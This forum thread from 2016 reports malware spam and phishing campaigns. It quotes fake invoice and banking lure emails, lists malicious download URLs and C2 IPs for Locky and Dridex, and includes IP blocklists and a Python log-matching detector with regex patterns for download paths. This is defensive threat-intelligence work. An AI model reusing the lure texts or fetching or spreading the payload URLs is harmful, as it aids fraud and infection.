SPAM frauds, fakes, and other MALWARE deliveries...


2072 replies to this topic

#1681 AplusWebMaster

Posted 22 March 2016 - 05:14 AM

FYI...

Fake 'Credit Note' SPAM - JS malware leads to ransomware
- https://myonlinesecu...-to-ransomware/
22 Mar 2016 - "An email with the subject of 'Credit Note CN-73290' from On Semiconductor Corp for [redacted] (0312) pretending to come from Accounts <message-service@ post.xero .com> with a zip attachment is another one from the current bot runs which downloads ransomware... These don’t look like either Locky or Teslacrypt ransomware so it appears that another gang of bad actors are using the same email templates as the 2 prolific malspammers to spread their version of ransomware. One example of the email looks like:
From: Accounts <message-service@ post.xero .com>
Date: Tue, 22 Mar 2016 04:38:32
Subject: Credit Note CN-73290 from On Semiconductor Corp for [victim company ] (0312)
Attachment: Credit Note CN-73290.zip
    Hi Kris,
    Attached is your credit note CN-73290 for 52611.30 AUD.
    This has been allocated against invoice number
    If you have any questions, please let us know.
    Thanks,
    McKesson Corporation ...


22 March 2016: Credit Note CN-73290.zip: Extracts to: Credit Note CN-64451.js
.. Current Virus total detections 2/56*. MALWR** shows a download of some sort of ransomware from
 http ://www .frontlinecarloans .com.au/public/js/bin.exe (VirusTotal 6/56***) (Hybrid Analysis [1]) (MALWR [2])
... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458611843/

** https://malwr.com/an...zhjNzI3OWEyY2E/
Hosts
103.4.18.250: https://www.virustot...50/information/
>> https://www.virustot...2af2b/analysis/
104.27.151.145
23.99.222.162


*** https://www.virustot...sis/1458626108/
TCP connections
104.27.151.145

1] https://www.hybrid-a...environmentId=4
Contacted Hosts
104.27.150.145

2] https://malwr.com/an...GUwMDBlMmMwYzk/
Hosts
104.27.150.145
23.101.187.68
104.27.151.145

___

Fake 'Blank 2' SPAM - word macro malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
22 Mar 2016 - "An email with a completely blank / empty body with the subject of 'Blank 2' pretending to come from Steve Gale <steve1gales@ gmail .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
From: Steve Gale <steve1gales@ gmail .com>
Date: Tue 22/03/2016 09:19
Subject: Blank 2
Attachment: Blank 2.docm


Body content: completely empty

22 March 2016: Blank 2.docm - Current Virus total detections 6/56*
.. MALWR** shows a download from http ://www .lightningstars .in/system/logs/87h76hghuhi.exe (VirusTotal 5/56***)
 which is inconclusive but looks like Dridex banking Trojan... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458638302/

** https://malwr.com/an...TNmZjFmMmVjOTM/
Hosts
162.144.73.194: https://www.virustot...94/information/
>> https://www.virustot...7f32f/analysis/

*** https://www.virustot...sis/1458637560/
___

Fake 'Statement' SPAM - JS malware leads to Locky Ransomware
- https://myonlinesecu...cky-ransomware/
22 Mar 2016 - "An email with the subject of 'FW: Statement S#327763' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Locky Ransomware... One example of the emails looks like:
From: Luis Wagner <WagnerLuis4446@ newthoughtcenterofhawaii .com>
Date: Tue 22/03/2016 09:03
Subject: FW: Statement S#327763
    Dear ans,
    Please find attached the statement (S#327763) that matches back to your invoices.
    Can you please sign and return.
    Best regards,
    Luis Wagner
    Business Development Director


22 March 2016: statement_ans_327763.zip: Extracts to -3- .JS files - 2 are identical & 1 different
.. Current Virus total detections [1] [2]:  MALWR*  shows -both- download Locky Ransomware from
 http ://alexsolenni .it/pol4dsf (VirusTotal 3/57**). This zip file contains -3- js files and an -unknown- file that when examined is actually empty... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
1] https://www.virustot...sis/1458641040/

2] https://www.virustot...sis/1458641075/

* https://malwr.com/an...GJmNGIzODA0ODI/
Hosts
178.237.15.128: https://www.virustot...28/information/
92.63.87.106: https://www.virustot...06/information/

** https://www.virustot...sis/1458641975/
TCP connections
92.63.87.106
___

Fake 'HP' SPAM - RTF macro malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
22 Mar 2016 - "An email that appears to come from HP (Hewlett Packard Enterprises) with the subject of 'Urgent: F400572 HARGREAVES LANSDOWN PLC/ HPE' coming from random names and email addresses with a malicious word doc RTF attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...PE-1024x906.png

5 March 2016: fillout_DAINV13955_derek.rtf - Current Virus total detections 1/57*
.. MALWR** shows a download from http ://connect.act-sat-bootcamp .com/dana/home.php
 which gave me hpe.jpg (which is a -renamed- .exe file and not any sort of image file) (VirusTotal 3/57***)
 Detections are inconclusive but likely to be Dridex banking Trojan... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458642936/

** https://malwr.com/an...jNjMTI2MjdhM2U/
Hosts
91.240.86.234: https://www.virustot...34/information/
>> https://www.virustot...b1072/analysis/

*** https://www.virustot...sis/1458642865/
___

Fake 'bodily injury' SPAM - JS malware leads to ransomware
- https://myonlinesecu...-to-ransomware/
22 Mar 2016 - "An email with the subject of 'You are being accused with bodily injury (Case: 02172723)' [random numbered] coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads what looks like Teslacrypt ransomware...

Screenshot: https://myonlinesecu...23-1024x447.png

5 March 2016: post_scan_02172723.zip: Extracts to: post_pgfEUf.js - Current Virus total detections 5/57*
.. MALWR**  shows a download of what looks like Teslacrypt but might just be Locky from
 http ://isityouereqq .com/80.exe?1 (VirusTotal 5/57***) -Both- Locky and Teslacrypt have used the -same- servers and -same- file names over the last few weeks... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458652839/

** https://malwr.com/an...zU1OTgxZjQwOGM/
Hosts
185.118.142.154: https://www.virustot...54/information/

*** https://www.virustot...sis/1458654208/
___

'Re-activate your Online Banking' – NatWest PHISH
- https://myonlinesecu...-bank-phishing/
22 Mar 2016 - "There are a few major common subjects in a phishing-attempt. Lots of them are either PayPal or your Bank or Credit Card, with a message saying some thing like:
    Urgent: Your card has been stopped !
    There have been unauthorised or suspicious attempts to log in to your account, please verify
    Your account has exceeded its limit and needs to be verified
    Your account will be suspended !
    You have received a secure message from < your bank>
    We are unable to verify your account information
    Update Personal Information
    Urgent Account Review Notification
    We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
    Confirmation of Order
    Re-activate your Online Banking


The original email looks like this:

Screenshot: https://myonlinesecu...ng-1024x554.png

... the site the link goes to http ://linkage .org.uk//new_website/online/personal-natwest/Log-in.php
 where a pop up asks you to download what appears to be the genuine Trusteer rapport security software:
> https://myonlinesecu...up-1024x547.png
... if you close the pop up & then fill in the email address and password [DON'T] you get a typical phishing page that looks very similar to a genuine NatWest bank page, if you don’t look carefully at the URL in the browser address bar... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or click-the-link in the email..."

linkage .org.uk: 37.61.235.162: https://www.virustot...62/information/
>> https://www.virustot...96afb/analysis/
___

“Copyright Violation” > Facebook Phish
- https://blog.malware...facebook-phish/
Mar 22, 2016 - "... we’ve spotted a phishing-scam using them as a launchpad for data theft. The name of the game is worrying the potential victim into clicking-on-the-supplied-link, with a curious mix of copyright violations and account verification. Here’s an example:
> https://blog.malware...fbcopyscam1.png
As you may have guessed, Facebook doesn’t issue copyright notices then direct you to apps pages. The 'Apps page' on offer here is a 'Get Verified' effort, complete with request for name, email/phone, password, profile link and 'comments':
> https://blog.malware...fbcopyscam2.jpg
We reported the page to Facebook, and it is now offline:
> https://blog.malware...fbcopyscam3.jpg
'Verify your account' -scams- are fairly old, but throwing tall tales of copyright issues into the mix for that extra sheen of panic isn’t quite as common. Always do your best to keep your logins safe and, if in doubt, go to the site owners directly..

-never- enter your credentials into a -link- sent your way in -random- Facebook messages."



Edited by AplusWebMaster, 22 March 2016 - 09:48 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.



#1682 AplusWebMaster

Posted 23 March 2016 - 07:42 AM

FYI...

Fake 'electronic invoice' SPAM - rtf macro malware
- https://myonlinesecu...-macro-malware/
23 Mar 2016 - "Following on from this malspam run yesterday* is today’s similar run with emails with the same subjects pretending to be 'your latest electronic invoice from D.E. Web Works' with a malicious word doc RTF attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking Trojans like Dridex or Dyreza and ransomware like Locky, cryptolocker or Teslacrypt...
* https://myonlinesecu...eads-to-dridex/
One of the emails looks like:
From: Brandie Everett <Everett.Brandie19@ business.telecomitalia .it> (random senders)
Date: Wed 23/03/2016 10:34
Subject: Urgent: F137648 MFI Group/ HPE
Attachment: inv_839922034.rtf
        MFI Group
        Invoice Due:03/31/2016 IJINV71859     Amount Due: $898.68     
    Dear Customer: Here is your latest electronic invoice from D.E. Web Works. If your invoice is not attached as a PDF, you can change your preference in the 'Invoice Summary' section at the bottom of this email. If you wish for your invoices to go to someone different in your organization, just reply to this email and let us know. For your convenience, mail your payment to the address listed on the invoice. Please note that if we have you set up for automatic billing to your credit card or ACH, you will still receive this email, but the balance due will reflect a zero balance. If it does not reflect a zero balance, please contact us immediately. If you have questions about the invoice you have received, please feel free to reply to this email or call us... Electronic invoicing is just one more way that D.E. Web Works is doing its part to give back to the environment. For more information about our environmental initiative, contact us. Thank you for helping us be Part of the Solution. We sincerely appreciate your business. MFI Group ...


23 March 2016: inv_839922034.rtf - Current Virus total detections 2/57*
.. MALWR** shows a download from http ://wrkstn09.peoriaseniorband .com/dana/home.php which gave me runwithme.exe. The analysis is inconclusive (VirusTotal 4/56***) but it is highly likely to be Dridex banking Trojan... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458736152/

** https://malwr.com/an...jA3NTg5MTE2NTI/
Hosts
109.237.108.25: https://www.virustot...25/information/
>> https://www.virustot...7ab77/analysis/

*** https://www.virustot...sis/1458736404/
___

Fake 'Back Office: Invoice' SPAM - rtf macro malware
- https://myonlinesecu...-macro-malware/
23 Mar 2016 - "An email with the subject of 'The Back Office : Invoice (MJINV78470)' pretending to come from random senders with a malicious word doc RTF attachment is another one from the current bot runs... The alleged sender’s name matches the name in the body of the email. The invoice number is random but matches the attachment name & number. One of the emails looks like:
From: Vincenzo Mann <Mann.Vincenzo42@ vyas .com>
Date: Wed 23/03/2016 12:22
Subject: The Back Office : Invoice ( MJINV78470 )
Attachment: backoffice_MJINV78470.rtf
    03/23/2016
    Please see the attached PDF File for account MJINV78470 in the amount of $
    583.44. This Invoice MJINV78470 is due on 03/23/2016.
    To view and/or print e-bills, you will need Microsoft Office Word installed on your computer.
    If you have any questions or need further assistance, please send a reply.
    Please include your name, address, and user name in your message.
    Please do not reply to this message.
    Thank you.
    Vincenzo Mann
    The Back Office


23 March 2016: backoffice_MJINV78470.rtf - Current Virus total detections 2/57*
.. MALWR** shows it downloads http ://wrkstn09.satbootcampaz .com/dana/home.php which delivered
 runwithme.exe (VirusTotal 4/56***). This is the same downloaded malware as described HERE[1]... looks like a password stealer and Banking Trojan. It might be Dridex or might be Vawtrak[2]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458739404/

** https://malwr.com/an...jIwMWVjMmY1NTY/
Hosts
109.237.108.25: https://www.virustot...25/information/
>> https://www.virustot...e670d/analysis/

*** https://www.virustot...e670d/analysis/

1] https://myonlinesecu...-macro-malware/

2] https://blogs.mcafee...erving-vawtrak/


Edited by AplusWebMaster, 23 March 2016 - 08:17 AM.



#1683 AplusWebMaster

Posted 24 March 2016 - 06:00 AM

FYI...

Fake 'Your order' SPAM - malicious attachment
- http://blog.dynamoo....r-has-been.html
24 Mar 2016 - "This -fake- financial spam does -not- come from Axminster Tools & Machinery, but is instead a simple -forgery- with a malicious attachment:
    From:    customer.service@ axminster .co.uk
    Date:    24 March 2016 at 10:11
    Subject:    Your order has been despatched
    Dear Customer
    The attached document provides details of items that have been packed and are ready for despatch.
    Please use your tracking number (contained within the attached document) to monitor the progress of your shipment.
    Customer Services ...


Attached is a file LN4244786.docm which comes in at least two different versions (VirusTotal results [1] [2]). Automated analysis is inconclusive.. however a manual analysis of the macros contained within.. show download locations at:
skandastech .com/76f45e5drfg7.exe
ekakkshar .com/76f45e5drfg7.exe
This binary has a detection rate of 6/56* and the Deepviz Analysis** and Hybrid Analysis*** show network traffic to:
71.46.208.93 (Bright House Networks, US)
64.76.19.251 (Level 3 Communications US, 64.76.19.251 / Impsat, Argentina)
91.236.4.234 (FHU Climax Rafal Kraj, Poland)
64.147.192.68 (Dataconstructs, US)
41.38.18.230 (TE Data, Egypt)
93.104.211.103 (Contabo, Germany)
159.8.57.10 (Kordsa Global Endustriyel Iplik, Turkey / SoftLayer Technologies, Netherlands)
82.144.200.154 (Kyivski Telekomunikatsiyni Merezhi LLC, Ukraine)
5.9.43.177 (Hetzner, Germany)
212.126.59.41 (LetsHost, Ireland)
It is not clear what the payload is here, but it is likely to be the Dridex banking trojan or possibly ransomware.
Recommended blocklist:
71.46.208.93
64.76.19.251
91.236.4.234
64.147.192.68
41.38.18.230
93.104.211.103
159.8.57.10
82.144.200.154
5.9.43.177
212.126.59.41
"
1] https://www.virustot...c0f8b/analysis/

2] https://www.virustot...c2cb3/analysis/

* https://www.virustot...sis/1458816089/

** https://sandbox.deep...95a3781bd5c2f1/

*** https://www.hybrid-a...environmentId=4

- https://myonlinesecu...-macro-malware/
24 Mar 2016 - "An email with the subject of 'Your order has been despatched' pretending to come from customer.service@axminster .co.uk with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: customer.service@ axminster .co.uk
Date: Thu 24/03/2016 08:43
Subject: Your order has been despatched
Attachment: LN4244786.docm
    Dear Customer
    The attached document* provides details of items that have been packed and are ready for despatch.
    Please use your tracking number (contained within the attached document) to monitor the progress of your shipment.
    Customer Services ...


24 March 2016: LN4244786.docm - Current Virus total detections 6/57*
.. Update: I have been reliably informed[1] that there are -several- versions of this macro word doc that will download Dridex from skandastech .com/76f45e5drfg7.exe -or- ekakkshar .com/76f45e5drfg7.exe
(VirusTotal 6/56**)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458808762/

** https://www.virustot...sis/1458814484/

1] https://twitter.com/...952076117155840
___

Fake 'Payment Receipt' SPAM - leads to Locky ransomware
- http://blog.dynamoo....ceipt-from.html
24 Mar 2016 - "This -fake- financial spam comes from random recipients, for example:
    From:    Marta Wood
    Date:    24 March 2016 at 10:10
    Subject:    FW: Payment Receipt
    Dear [redacted],
    Thank you for your payment. It is important that you print this receipt and record the receipt number as proof of your payment.
    You may be asked to provide your receipt details should you have an enquiry regarding this payment.
    Regards,
    Marta Wood
    Technical Manager - General Insurance


Attached is a ZIP file that incorporates the recipient's name plus a word such as 'payment, details or receipt' plus a random number. This archive contains a randomly-named script (starting with "PM") and ending with .js.js plus what appear to be a set of hidden .BIN files which may well be junk. VirusTotal detection rates for the scripts are fairly low (examples [1] [2]..). Automated analysis [7] [8].. shows binary download locations at:
stie.pbsoedirman .com/msh4uys
projectpass .org/o3isua
natstoilet .com/l2ps0sa [404]
yourhappyjourney .com/asl2sd [404]
Two of the locations are 404ing, the two that work serve up a different binary each. There are probably many more download locations and more binaries... The VirusTotal results for the binaries [19] [20] indicate that this is ransomware, specifically it is Locky. Automated analyses [21] [22].. show it phoning home to:
195.123.209.123 (ITL, Latvia)
107.181.187.228 (Total Server Solutions, US)
217.12.218.158 (ITL, Netherlands)
46.8.44.39 (PE Dunaeivskyi Denys Leonidovich, Ukraine)
... Recommended blocklist:
195.123.209.123
107.181.187.228
217.12.218.158
46.8.44.39
"
1] https://www.virustot...535ca/analysis/

2] https://www.virustot...sis/1458819009/

7] https://malwr.com/an...DZhNTEzYmI0ZTE/

8] https://malwr.com/an...TgzZjc0NWFiYjk/

19] https://www.virustot...sis/1458819857/

20] https://www.virustot...sis/1458819870/

21] https://sandbox.deep...404214fb0c8251/

22] https://sandbox.deep...9067322c7906b0/
___

Fake 'Sixt Invoice' SPAM - word macro malware
- https://myonlinesecu...d-macro-malware
24 Mar 2016 - "An email with the subject of 'Sixt Invoice: 0252056792' from 24.03.2016 (random numbers) pretending to come from random names, companies and email addresses with a malicious word doc attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...16-1024x780.png

24 March 2016: Sixt_receipt_49200616.doc - Current Virus total detections 2/56*
.. downloads from http ://web-intra.fhc-inc .org/live/essentials.php which gave me
 65a7fwgybid.xls (VirusTotal 5/56**) which is actually an .exe file -not- an XLS excel spreadsheet
-despite- the file name & icon... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458833067/

** https://www.virustot...sis/1458832875/

> https://www.hybrid-a...environmentId=4
Sixt_receipt_15768471.doc
Contacted Hosts
92.63.100.7: https://www.virustot....7/information/
>> https://www.virustot...ac558/analysis/
38.64.199.113: https://www.virustot...13/information/
>> https://www.virustot...f2a17/analysis/
79.124.67.226: https://www.virustot...26/information/
>> https://www.virustot...c1e3c/analysis/
222.255.121.202: https://www.virustot...02/information/
>> https://www.virustot...77124/analysis/
47.88.191.14: https://www.virustot...14/information/
>> https://www.virustot...f7417/analysis/
197.96.139.253: https://www.virustot...53/information/
>> https://www.virustot...67c24/analysis/


Edited by AplusWebMaster, 24 March 2016 - 10:39 AM.

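The "Recommended blocklist" IP sets and download URLs quoted in the posts above are the sort of indicators a defender would run against web proxy logs. What follows is an added example of my own, not code from the quoted blogs or from this thread. The IPs are the two dynamoo blocklists quoted above, the /dana/home.php path is the one quoted in the HP and Back Office RTF posts, the short random-token path rule is my own heuristic built from the Locky download paths listed above (it will be noisy on real traffic and should be treated as a weak signal), and the proxy log format and log lines are constructed for the example.

```python
"""Match constructed proxy log lines against the IPs and URL paths quoted above.
Added example; the log format and sample lines are constructed, not real traffic."""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# The two "Recommended blocklist" sets quoted from dynamoo (24 Mar 2016).
BLOCKLIST_IPS = {
    "71.46.208.93", "64.76.19.251", "91.236.4.234", "64.147.192.68",
    "41.38.18.230", "93.104.211.103", "159.8.57.10", "82.144.200.154",
    "5.9.43.177", "212.126.59.41",
    "195.123.209.123", "107.181.187.228", "217.12.218.158", "46.8.44.39",
}

# Path rules. Hosts rotate between runs, paths repeat, so match on the path.
# The second rule is my heuristic: 5-8 lowercase alphanumerics with at least
# one digit, modelled on the quoted Locky paths (/pol4dsf, /ke4uad, /n7eua ...).
PATH_RULES = [
    ("dridex_stager_path", re.compile(r"^/dana/home\.php$")),
    ("locky_style_token_path", re.compile(r"^/(?=[a-z]*\d)[a-z0-9]{5,8}$")),
]

# Constructed log format: timestamp client method url status destination-ip
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+"
    r"(?P<url>\S+)\s+(?P<status>\d{3})\s+(?P<dst>\S+)$"
)


@dataclass(frozen=True)
class Finding:
    client: str
    url: str
    reason: str


def parse_line(line: str) -> dict[str, str] | None:
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else None


def check_record(rec: dict[str, str]) -> list[str]:
    """Return the list of rule names that fire for one parsed record."""
    reasons = []
    parts = urlsplit(rec["url"])
    host = parts.hostname or ""
    # Either the resolved destination or an IP-literal host on the blocklist.
    if rec["dst"] in BLOCKLIST_IPS or host in BLOCKLIST_IPS:
        reasons.append("dst_ip_on_blocklist")
    for name, pattern in PATH_RULES:
        if pattern.match(parts.path):
            reasons.append(name)
    return reasons


def scan(lines: list[str]) -> list[Finding]:
    """Run every rule over every parseable line and collect the hits."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for reason in check_record(rec):
            findings.append(Finding(rec["client"], rec["url"], reason))
    return findings


# Constructed sample: one Dridex stager fetch, one Locky-style token fetch,
# one check-in to a blocklisted IP, one benign request. 203.0.113.7 and
# 10.1.2.x are documentation/private addresses, not real indicators.
SAMPLE_LOG = """\
2016-03-23T10:40:01Z 10.1.2.34 GET http://wrkstn09.peoriaseniorband.com/dana/home.php 200 109.237.108.25
2016-03-24T10:15:44Z 10.1.2.35 GET http://stie.pbsoedirman.com/msh4uys 200 203.0.113.7
2016-03-24T10:16:02Z 10.1.2.35 POST http://195.123.209.123/main.php 200 195.123.209.123
2016-03-24T10:20:00Z 10.1.2.36 GET http://www.example.com/index.html 200 93.184.216.34
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.client} -> {f.url}: {f.reason}")
```

Matching on the destination IP catches the post-infection check-in even when the URL host is an IP literal, which is why the record is checked on both fields; the path rules are what catch the first download, before the binary has run and before any IP in the blocklist is contacted.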


#1684 AplusWebMaster

Posted 25 March 2016 - 10:17 AM

FYI...

Fake 'Invoice Copy' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
25 Mar 2016 - "Although it is Good Friday... the Locky ransomware campaign continues unabated with an email with the subject of 'FW: Invoice Copy' pretending to come from a random or unknown name at your own email address with a zip attachment is another one from the current bot runs which downloads Locky ransomware...One of the emails looks like:
From: Stacie Tucker <fax@ [redacted] .co.uk> [Your own email address]
Date: Fri 25/03/2016 09:03
Subject: FW: Invoice Copy
Attachment: copy-fax_323571.zip
    Dear fax,
    Please review the attached copy of your Invoice (number: IN323571) for an amount of $4031.15.
    Thank you for your business.
    Stacie Tucker
    Director, Digital Communications


25 March 2016: copy-fax_323571.zip: Extracts to: PMTac2edf.js.js Current Virus total detections 1/58*
.. MALWR** shows a download of Locky ransomware from
 http ://holidaysinkeralam .com/ke4uad (VirusTotal 6/58***). Other download locations so far discovered include:
 http ://goldenlifewomen .com/o3isvs (VT[1])
 http ://fssblangenlois .ac.at/k3idv (VT[2])
 http ://warrendotwarren .url.ph/ldpeo3s (VT[3])
... more detailed breakdown, including the multitude of hosts and differing file #’s delivering today’s malware can be found HERE[4] courtesy of Techelplist. This zip file contains 2 js files and 3 dat files that when examined are actually -empty- ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458900076/

** https://malwr.com/an...zk4NzgwNGM2MmQ/
Hosts
184.168.47.225
93.170.104.127


*** https://www.virustot...sis/1458901000/
TCP connections
89.108.84.132

1] https://www.virustot...sis/1458910253/
TCP connections
185.117.72.94

2] https://www.virustot...sis/1458910585/
TCP connections
89.108.84.132

3] https://www.virustot...sis/1458911035/
TCP connections
185.117.72.94

4] https://otx.alienvau...37f23a0c0f414d/




#1685 AplusWebMaster

Posted 28 March 2016 - 04:16 AM

FYI...

Fake 'Overdue Incoices' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
28 Mar 2016 - "... misspelled subject of 'FW: Overdue Incoices' pretending to come from random senders with a zip attachment is another one from the current bot runs which downloads Locky ransomware... One of the emails looks like:
From: Boyce Day <DayBoyce99@ armadev .com>
Date: Mon 28/03/2016 09:09
Subject: FW: Overdue Incoices
Attachment: sexy123_copy_489051.zip
    Dear sexy123,
    Please find attached copy updated statement as your account has 3 overdue incoices.
    Is there any reasons why they haven’t yet been paid?
    Best Wishes,
    Boyce Day
    Vice President Finance


28 March 2016: sexy123_copy_489051.zip: Extracts to: SCN734815.txt.js - Current Virus total detections 2/58*
.. MALWR** and Hybrid Analysis[3] show a download of Locky ransomware from
 http ://www.suansawanresort .com/n7eua (VirusTotal 6/58[4])
Other download locations so far discovered include
    http ://bbwsa .com/m7rysa
    http ://dukeplasticslab .com/j47akfa
    http ://foothillsofhemet .com/k4sifs
    http ://www.stopeugenicsnow .eu/m8dhs
    http ://blackmountaintipis .com/mxn3aad
This zip file contains 3 js files and 3 unknown files that when examined are actually empty (full of 0 byte padding, actually a mix of 0 & 1)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459152409/

** https://malwr.com/an...jcyZGJiYmJmOTY/
Hosts
192.254.235.178
84.19.170.249
: https://www.virustot...49/information/
>> https://www.virustot...fcd59/analysis/

3] https://www.reverse....environmentId=4
Contacted Hosts
192.254.235.178
92.63.87.134
: https://www.virustot...34/information/
>> https://www.virustot...0cae1/analysis/

4] https://www.virustot...sis/1459152904/
TCP connections
78.46.170.79
___

Fake 'FW:' attached invoice SPAM - JS leads to Locky Ransomware
- https://myonlinesecu...ment-js-malware
28 Mar 2016 - "... an email with the subject of 'FW:' pretending to come from random senders with a zip attachment is another one from the current bot runs which downloads... Locky Ransomware... The email looks like:
From: Random senders
Date: Mon 28/03/2016 09:47
Subject: FW:
Attachment: copy_ellie_734294.zip
    Please see the attached invoice and remit payment according to the terms listed at the bottom of the invoice.
    If you have any questions please let us know.


5 March 2016: copy_ellie_734294.zip: Extracts to a folder named 'warning' which contains -2- files both appearing to have -same- content although different file # ticket_613588769.js VT 0/57[1] and
 125_ticket_942667766.lib VT 0/57[2]. MALWR[3] shows a download from
 http ://twocircles .in/HwgIY9 .exe (VirusTotal 5/58[4]) which is inconclusive in detections but MALWR[5] shows contacts of innocent files from Microsoft Update. Hybrid analysis[6] definitely shows Locky Ransomware...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
1] https://www.virustot...sis/1459155351/

2] https://www.virustot...sis/1459155491/

3] https://malwr.com/an...jIxZWRiMWFhNDg/

4] https://www.virustot...sis/1459155069/

5] https://malwr.com/an...mEzMjMwY2ZjYjc/
Hosts
184.25.56.84

6] https://www.hybrid-a...environmentId=4
Contacted Hosts
66.160.196.39: https://www.virustot...39/information/
>> https://www.virustot...b153c/analysis/
83.217.8.127
___

Fake 'Document(1).pdf' SPAM - JS malware leads to ransomware
- https://myonlinesecu...-to-ransomware/
28 Mar 2016 - "An email that tries to make you think it is coming from your own email domain/company with the subject of 'Document(1).pdf' pretending to come from netadmin <nadiam1pa@ your email domain .tld> with a zip attachment is another one from the current bot runs which downloads some sort of ransomware... The email looks like:
From: netadmin <nadiam1pa@ your email domain .tld>
Date: Document (1).pdf
Subject: Document (1).pdf
Attachment: Document (1).zip
    Document (1).pdf


28 March 2016: Document (1).zip: Extracts to:  FDV4328982511.js - Current Virus total detections 7/57*
.. MALWR** shows a download of this ransomware file from
 http ://store.brugomug .co.uk/765f46vb.exe (VirusTotal 3/58***) MALWR[4]...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459173075/

** https://malwr.com/an...DY4NzIxNjg0YzA/
Hosts
50.56.106.21
84.19.170.249
: https://www.virustot...49/information/
>> https://www.virustot...d2673/analysis/

*** https://www.virustot...sis/1459171814/
TCP connections
91.200.14.73

4] https://malwr.com/an...GI3YTJhNzk5NDE/
Hosts
91.200.14.73: https://www.virustot...73/information/
>> https://www.virustot...adf21/analysis/

store.brugomug .co.uk: 50.56.106.21: https://www.virustot...21/information/
>> https://www.virustot...4778e/analysis/
___

Fake 'invoice' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
28 Mar 2016 - "An email with the subject of [random company name] 'invoice' – [recipient domain] pretending to come from random senders with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... One of the emails looks like:
From: Random senders
Date: Mon 28/03/2016 16:04
Subject: CERAMIC FUEL CELLS Invoice ...
Attachment: Invoice Number 1460847 – Issue Date 02166113.rtf
    Sent from my iPad
    Begin forwarded message:
    Thank you for choosing CERAMIC FUEL CELLS! We hope you enjoy our new invoice format. In our effort to be more environmentally friendly, our new invoice saves paper yet provides all of the same information in a more condensed format. Please let us know if you have any questions or concerns.


28 March 2016: Invoice Number 1460847 – Issue Date 02166113.rtf - Current Virus total detections 4/57*
.. MALWR shows a download from
 http ://store.clarksvillevw .com/smartphones/iphonese.php which gave me 122.wav which is -NOT- a wav file despite appearing to be able to be played in windows explorer - but is a renamed .exe file
(VirusTotal 3/58**). This will probably turn out to be either Dridex or Locky ransomware, but analysis is pending...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459177325/

** https://www.virustot...sis/1459177386/

store.clarksvillevw .com: 185.118.166.167: https://www.virustot...67/information/
>> https://www.virustot...0987c/analysis/
___

Fake 'TERREDOC' SPAM - malicious attachment
- http://blog.dynamoo....sage-9758w.html
28 Mar 2016 - "This French-language -spam- comes with a malicious attachment:
    From:    Christine Faure [c.faure@ technicoflor .fr]
    Date:    28 March 2016 at 16:54
    Subject:    Envoi d’un message : 9758W-TERREDOC-RS62937-15000
    Votre message est prêt à être envoyé avec les fichiers ou liens joints suivants :
    9758W-TERREDOC-RS62937-15000
    Message de sécurité


To save you putting it into 'Google Translate', the body text reads:
'Your message is ready to be sent with the following file or link attached'...
